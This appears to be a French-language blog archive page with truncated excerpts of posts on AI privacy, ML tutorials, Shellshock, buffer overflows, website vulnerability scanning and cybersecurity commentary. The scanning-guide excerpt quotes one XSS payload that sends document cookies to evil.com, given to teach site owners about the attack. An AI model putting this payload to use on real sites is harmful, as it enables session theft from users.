Accéder au contenu principal

Articles

Affichage des articles du juin, 2025
AI, Consent, and Control: Who Owns Your Digital Shadow in 2025? In 2025, artificial intelligence no longer relies solely on explicit inputs. It thrives on signals we don’t even realize we emit — patterns in our behavior, tone of voice, scrolling habits, micro-delays in typing. These fragments, stitched together by machine learning models, form what is increasingly referred to as your “digital shadow.” This digital shadow is not just metadata. It's a real-time simulation of who you are, used to predict what you will do, feel, or choose. And the question that arises now is not whether we are being watched, but whether we still own our agency in a world where AI interprets and acts on our behalf — often without our knowledge or permission. The Invisible Profile Traditional privacy concerns were about data leaks, hacked passwords, and overreaching cookies. In 2025, the threat is more subtle and systemic: inference. AI systems are not just storing your data; they are constructin...
Créer une API Météo Intelligente avec Python, IA et FastAPI 🌦️ Créer une API Météo Intelligente avec Python, IA et FastAPI Ce projet consiste à créer une API REST moderne qui interroge un service météo en temps réel, puis applique un modèle de machine learning pour prédire la température dans les prochaines heures. Le tout est exposé via une interface web performante grâce à FastAPI. 🧠 Objectif de l'API Collecter les données météo d'une ville via l'API OpenWeatherMap Appliquer un modèle IA entraîné sur des données historiques Exposer les résultats sous forme d’API REST 🧰 Librairies utilisées Outil Utilisation requests Appels HTTP à l'API météo pandas Manipulation de données scikit-learn Modélisation de la prédiction météo FastAPI Création de l’API REST uvicorn Serveur de développement performant pip install fastapi uvicorn requests pandas scikit-learn 📡 Récupération des données météo...
Introduction au Machine Learning avec Python : Votre Premier Modèle IA de A à Z L'intelligence artificielle, souvent associée à des concepts abstraits et complexes, devient accessible grâce à Python. Aujourd’hui, vous allez découvrir comment créer un modèle de machine learning qui apprend à prédire si un passager du Titanic a survécu ou non. Ce projet concret vous donnera une vraie compréhension de ce qu’est l’IA appliquée. Étape 1 : Comprendre les données et le rôle de df Dans ce tutoriel, nous utilisons un jeu de données très célèbre : celui du Titanic. Chaque ligne représente un passager, avec des colonnes comme son âge, son sexe, sa classe dans le bateau, le prix payé pour son billet, et surtout, s’il a survécu ( Survived = 1 ) ou non ( Survived = 0 ). Quand on lit ce fichier CSV avec pandas , on stocke les données dans une structure appelée DataFrame , abrégée en df . Un DataFrame est un tableau à deux dimensions : les colonnes sont les variables (âge, sexe…), et ch...

🛡️ Analyse de faille avec Nikto : exploitation et protection contre Shellshock via CGI

Introduction : pourquoi analyser les failles ? Dans le monde de la cybersécurité, l’analyse de faille est un processus indispensable. Elle permet d’identifier et corriger les vulnérabilités avant qu’elles ne soient exploitées. Un attaquant n’a besoin que d’un seul point faible : à nous de le détecter avant lui. Dans cet article, nous allons nous intéresser à une faille emblématique : Shellshock (CVE-2014-6271), qui a touché Bash en 2014. Nous verrons comment utiliser Nikto , un scanner de vulnérabilités web, pour la détecter, comment l’exploiter manuellement, et surtout comment s’en prémunir. Pour cela, il est essentiel de comprendre le rôle joué par CGI (Common Gateway Interface) dans l’exploitation. 🧠 CGI : le chaînon faible de Shellshock Qu’est-ce que CGI ? CGI (Common Gateway Interface) est une spécification permettant à un serveur web d’exécuter des programmes externes – appelés scripts CGI – pour générer dynamiquement des réponses HTTP. Ces scripts peuvent être écrits e...
Comprendre les Buffer Overflows - Analyse Technique 🗂️ Table des matières 🧠 Introduction 📚 Comprendre la vulnérabilité 🛠️ Compilation sans protections 🔎 Mécanisme d'exploitation 🛡️ Protections modernes 🧰 Outils à connaître 🔧 Environnement Docker 📌 Rappel sur les registres : Lorsqu'une fonction est exécutée, plusieurs registres processeur sont utilisés. Parmi eux : RIP (x86_64) : registre d'instruction, contient l'adresse de la prochaine instruction à exécuter. EIP (x86 32-bit) : équivalent de RIP sur les systèmes 32 bits. RBP / EBP : pointeur de base de la pile, souvent utilisé pour référencer les variables locales et les arguments. RSP / ESP : pointeur de sommet de la pile, toujours à jour avec l'adresse actuelle du haut de pile. Ces registres sont au cœur des méca...
🔐 Scanner son propre site web pour détecter les vulnérabilités : un guide complet pour débutants et curieux de cybersécurité 🧭 Pourquoi ce guide ? Internet est une vitrine. Et comme toute vitrine, elle peut être brisée. Un site web non sécurisé peut être : défiguré (defacement) utilisé pour héberger du code malveillant piraté pour voler des données utilisateurs utilisé comme relais pour des campagnes de phishing 👉 Pourtant, 80 % des failles exploitées aujourd’hui sont connues et évitables . Dans cet article, je vous montre comment scanner votre propre site pour détecter les vulnérabilités les plus courantes. 🚨 Exemples concrets d'attaques fréquentes 1. XSS (Cross-Site Scripting) But : injecter du JavaScript malveillant dans une page web. Exemple : <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script> Résultat : vol de session, redirection ou infection. 2. Exposition de fichiers sensibles But : accéder à des fich...

Quand l’intelligence artificielle entre dans la chambre des enfants

  Les jouets intelligents n’ont rien de nouveau… mais ce qui arrive change tout L’univers du jouet connaît depuis quelque temps une transformation silencieuse. On parle beaucoup de technologies dans la santé, la finance ou la mobilité, mais plus rarement dans les espaces dédiés à l’enfance. Pourtant, c’est bien dans la chambre des enfants que se joue une des mutations les plus délicates et peut-être les plus structurantes de notre rapport à l’intelligence artificielle. Car les jouets dits « intelligents » ne datent pas d’hier. Depuis plus de dix ans, les fabricants expérimentent des objets capables d’interagir, de répondre, voire d’apprendre. Mais ce qui émerge aujourd’hui, à travers des partenariats comme celui que Mattel vient de conclure avec OpenAI, n’est pas simplement une nouvelle gamme de jouets connectés. C’est un changement de nature. Dès le début des années 2010, des jouets ont été équipés de capteurs, de micros, de voix synthétiques. Des poupées comme Hello Barbie ont ...

Why the Press Is a Frequent Target of Cyber Attacks?

  In a world where information flows faster than ever, journalism has never been more vital — or more vulnerable. The press plays a central role in holding power to account, exposing injustice, and informing democratic debate. But this mission comes at a cost. Media organizations increasingly find themselves under digital siege, facing relentless cyber attacks designed not only to silence but also to manipulate. Behind these assaults lie complex forces: authoritarian governments seeking control, shadowy cyber units, and the chaotic amplification of social media platforms. The State’s Expanding Grip on Information One of the most significant drivers of cyber attacks on the press is the ambition of states — particularly authoritarian regimes — to dominate the narrative. In many parts of the world, governments no longer rely solely on censorship or physical intimidation. Instead, they turn to digital warfare: surveillance, hacking, blackmail, and disruption campaigns engineered to neu...

When AI Meets Cybersecurity: Autonomous Defense or Emerging Threat?

When AI Meets Cybersecurity: Autonomous Defense or Emerging Threat? Introduction The convergence of artificial intelligence and cybersecurity is reshaping the digital battlefield. Where cybersecurity was once a field dominated by manual configuration, human vigilance, and static rule sets, AI introduces an adaptive, data-driven, and partially autonomous dimension to digital defense. But this transformation comes with a paradox: the same AI models that protect systems are now being used to compromise them. The line between defender and attacker has never been thinner, nor the tools more symmetric. AI as a Defensive Asset Artificial intelligence today plays a central role in enabling organizations to detect threats in real-time, to react faster than human teams ever could, and to anticipate attack paths before they are exploited. It analyzes vast streams of network activity, learns the normal behaviors of users and systems, and flags anomalies that would otherwise go unnoticed. This ...

La cyber sécurité passe aussi par la sécurité. Ici, celle des chargeurs.

On me demande souvent si cela n'est pas sans risque de laisser son chargeur branché quand on n'utilise pas l'appareil. Analyse ci dessous! Il est fréquent de laisser un chargeur branché en permanence dans une prise, souvent par commodité. Pourtant, il est recommandé d’adopter le réflexe de le débrancher lorsqu’il n’est pas utilisé. 🔥 Un geste de sécurité avant tout Laisser un chargeur branché sans appareil connecté n’apporte aucun avantage fonctionnel . Bien que la consommation d’électricité soit minime , ce comportement peut présenter des risques liés à la surchauffe . Certains chargeurs, notamment de qualité inférieure, peuvent chauffer de manière excessive s’ils restent branchés en continu, ce qui augmente le risque d’incident électrique ou d’incendie . ⚡ Un impact énergétique négligeable D’un point de vue énergétique, la consommation d’un chargeur inactif est très faible . Recharger un téléphone pendant une année complète représente moins de 2 euros sur la facture...

Axel Legay -- Pourquoi la cybersécurité ne doit pas être laissée aux seules universités

  Introduction La cybersécurité est devenue un pilier fondamental de la stabilité numérique mondiale. Alors que les universités jouent un rôle clé dans la formation des talents, il serait illusoire et risqué de leur confier l’entière responsabilité de la cybersécurité. Cette mission doit être collective, agile et ancrée dans le réel , car les cybermenaces n’attendent pas la fin d’un semestre pour frapper. 1. Le rôle (limité) des universités dans la cybersécurité Les universités forment les bases théoriques : cryptographie, protocoles, gouvernance IT, etc. Mais plusieurs limites émergent : 🐢 Temps long académique : un programme de master met souvent 2 à 4 ans à s’actualiser. 🔧 Peu de pratique offensive/défensive réelle (peu de labs type "Red Team" vs "Blue Team"). 📚 Absence de confrontation au monde réel : peu de contact avec des cyberattaques réelles ou APT (Advanced Persistent Threats). Exemple : en 2023, de nombreuses universités en Europe ...

De la technique de transition à l’université : j’y suis arrivé, tu peux le faire aussi

  En Belgique, on entend encore trop souvent que seuls les élèves du général peuvent réussir à l’université. Que si tu fais de la technique, tu es « condamné » à des études plus courtes, à des ambitions limitées. Moi, je suis là pour te dire que c’est faux. J’ai commencé mon parcours dans l’enseignement  technique de transition . À l’époque, certains pensaient que je faisais un choix par défaut. Ce qu’ils ne voyaient pas, c’est que j’apprenais autrement. Que ce que je faisais avait du sens. Que j’aimais comprendre  comment les choses fonctionnent , les manipuler, expérimenter. 📚 Le début d’un chemin, pas la fin Ce n’était pas le chemin le plus valorisé, mais c’était  le mien . Et ce chemin m’a mené loin. Après la technique, j’ai poursuivi à l’université. J’ai obtenu un doctorat. J’ai enseigné, dirigé des projets de recherche internationaux, conseillé des gouvernements. J’ai été  professeur d’université ,  expert en cybersécurité ,  Wallon de l’année ,...